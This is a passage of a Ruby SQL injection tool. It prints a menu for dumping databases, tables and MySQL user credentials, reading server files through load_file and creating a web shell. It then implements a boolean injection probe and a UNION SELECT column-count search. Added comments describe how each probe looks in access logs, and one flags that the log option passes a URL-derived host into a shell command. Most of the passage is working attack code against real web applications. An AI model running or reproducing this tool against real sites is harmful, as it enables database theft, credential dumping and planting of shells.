      print "4 - Show tables from the a DB\n"
      print "5 - Show columns from the a table of the DB\n"
      print "\n[mysql.user]\n\n"
      print "6 - Show users\n"
      print "\n[Others]\n\n"
      print "7 - Show details\n"
      print "8 - Dump data\n"
      print "9 - Fuzz Files with load_file\n"
      print "10 - Load files with load_file\n"
      print "11 - Create Shell\n"
      print "12 - Show log\n"
      print "13 - Change target\n"
      print "14 - Exit\n\n"
     
      print "[+] Option : "
      op = gets.chomp
       
      if op == "1"
        gettables(url,by)
        retorno(url,by)
      elsif op == "2"
        print "\n\n[+] Table : "
        table = gets.chomp
        getcolumns(url,by,table)
        retorno(url,by)
      elsif op == "3"
        getdbs(url,by)
        retorno(url,by)
      elsif op == "4"
        print "\n\n[+] DB : "
        db = gets.chomp
        gettablesbydb(url,by,db)
        retorno(url,by)
      elsif op == "5"
        print "\n\n[+] DB : "
        db = gets.chomp
        print "\n\n[+] Table : "
        tab = gets.chomp
        getcolumnsbydb(url,by,db,tab)
        retorno(url,by)
      elsif op == "6"
        mysqluser(url,by)
        retorno(url,by)
      elsif op == "7"
        details(url,by)
        retorno(url,by)
      elsif op == "8"
        print "\n\n[+] Table : "
        table = gets.chomp
        print "\n\n[+] Column 1 : "
        col1 = gets.chomp
        print "\n\n[+] Column 2 : "
        col2 = gets.chomp
        dumper(url,by,table,col1,col2)
        retorno(url,by)
      elsif op == "9"
        fuzzfile(url,by)
        retorno(url,by)
      elsif op == "10"
        print "\n\n[+] File : "
        file = gets.chomp
        abrirfile(url,by,file)
        retorno(url,by)
      elsif op == "11"
        print "\n\n[Full Source Discloure] : "
        full = gets.chomp
        print "\n\n[Directory to test] : "
        dir = gets.chomp
        into(url,by,full,dir)
        retorno(url,by)
      elsif op == "12"
        urla = URI.parse(url)
        ar = "logs_webs/"+urla.host+".txt"
        # NOTE(review): the host taken from the URL is interpolated into a
        # shell command line; "start" is the Windows shell's open command.
        system("start #{ar}")
        retorno(url,by)
      elsif op == "13"
        inicio()
      elsif op == "14"
        copyright()
      else
        # Unrecognised input: show the menu again.
        retorno(url,by)
      end
    end

    # Searches for the column count of the vulnerable query: it sends
    # "union select" requests whose column list grows by one on each pass
    # over the range '2'..'25', each column wrapped in the K0BRA marker.
    # When a marker shows up in the response, the matching position is
    # replaced by the "hackman" placeholder, the resulting URL is logged and
    # the menu is opened on it.
    #
    # Defender view: in access logs this is a burst of up to 24 requests to
    # one page, each containing "and 1=0", "union select" and a list of
    # concat(0x4b30425241,...) terms one element longer than the previous.
    def findlength(url,by)
      pass1,pass2 = bypass(by)
      z = "1"                                      # plain column list: 1,2,3,...
      x = "concat(0x4b30425241,1,0x4b30425241)"    # same list with markers
      for num in ('2'..'25')
        z = z+","+num
        x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
        code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
        if code=~/K0BRA(.*?)K0BRA/
          print "[+] The Page has "+num+" columns\n"
          print "[+] The number "+$1+" print data"
          # String#sub replaces the first occurrence of that text in z.
          z = z.sub($1,"hackman")
          sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
          savefile(url,"[+] SQLI : "+sqli)
          savefile(url,"[+] Bypass : "+by+"\n")
          central(sqli,by)
        end
      end
    end

    # Boolean-difference check: fetches +page+ once with an always-false
    # condition ("and 1=0") and once with an always-true one ("and 1=1")
    # appended, and treats any difference between the two response bodies as
    # a sign of injection. On "not vulnerable" the operator may still force
    # the column search.
    #
    # Defender view: the paired "and 1=0" / "and 1=1" requests against the
    # same parameter within a short interval are a classic probe signature.
    def testvul(page,by)
      pass1,pass2 = bypass(by)
      print "\n\n[+] Testing vulnerability ...\n\n"
      codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
      codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
      if codeuno != codedos
        print "[+] Vulnerable !\n"
        findlength(page,by)
      else
        print "[-] Not vulnerable\n"
        print "\n\n[+] Scan anyway y/n : "
        op = gets.chomp
        if op == "y"
          findlength(page,by)
      else
        volverinicio()
      end
    end 
    end

    # Start prompt: asks for the target page and the bypass mode. A page that
    # already contains the "hackman" placeholder goes straight to the menu;
    # anything else is passed to testvul() first.
    def inicio()
      clean()
      head()
      print "\n\n[+] Page : "
      pagina = gets.chomp
      print "\n\n[+] Bypass : "
      modo = gets.chomp
      return central(pagina,modo) if pagina=~/hackman/
      testvul(pagina,modo)
    end

    # Program start: create the log directory if needed, then show the prompt.
    installer()
    inicio()

    # The End ?